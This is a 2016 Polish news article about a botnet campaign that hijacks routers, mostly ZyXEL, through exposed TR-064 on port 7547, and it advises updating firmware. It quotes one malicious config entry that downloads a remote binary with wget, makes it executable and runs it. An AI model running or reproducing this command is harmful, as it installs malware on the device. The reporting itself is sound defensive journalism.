Bezpieczeństwo

Nowy bot atakuje routery w Polsce

opublikowano przez Wojciech Kulik w dniu 2016-11-28

Nawet kilkadziesiąt tysięcy routerów może paść ofiarą nowego cyberataku. Najlepszym sposobem obrony jest aktualizacja oprogramowania.

Nawet kilkadziesiąt tysięcy użytkowników w Polsce (a konkretnie ich routerów) może być narażonych na cyberataki, mające na celu tworzenie botnetów wykorzystywanych później do niecnych celów. 

O całej sprawie poinformował serwis Zaufana Trzecia Strona, któremu o problemie doniósł jeden z użytkowników. Zaniepokojony restartami swojego routera sprawdził on konfigurację i dostrzegł w niej podejrzany wpis „cd /tmp;wget http://l.ocalhost.host/2;chmod 777 2;./2”. Laboratorium wspomnianego serwisu podjęło się analizie problemu i odkryło, że problem może być dość poważny.

Teoretycznie podatnych na atak urządzeń dostępowych (czyli takich z otwartym portem 7547 i usługą RomPager) jest ponad 65 tysięcy. Liczba ta pochodzi jednak z Shodana, co oznacza, że może zawierać częściowo nieaktualne dane. Aby router (przede wszystkim firmy ZyXEL) mógł paść ofiarą, muszą wystąpić dwie okoliczności, a mówiąc konkretnie: dwa błędy – zbyt szeroka dostępność protokołu TR-064 i możliwość wykonania poleceń powłoki. 

Dokładną analizę ataku znajdziecie w serwisie Zaufana Trzecia Strona.

Przed problemem można uchronić się w sposób prosty, a przez wiele osób niedoceniany. Mówimy tutaj o zwykłej aktualizacji oprogramowania urządzenia dostępowego. 

Źródło: Zaufana Trzecia Strona

marketplace

Komentarze

18
Zaloguj się, żeby skomentować
avatar
Dodaj
Komentowanie dostępne jest tylko dla zarejestrowanych użytkowników serwisu.
  • avatar
    Najlepszym sposobem obrony jest wyjecie wtyczki od internetu.
    Zaloguj się
  • avatar
    I właśnie dlatego mam router open source z Tomato firmware :)
    Zaloguj się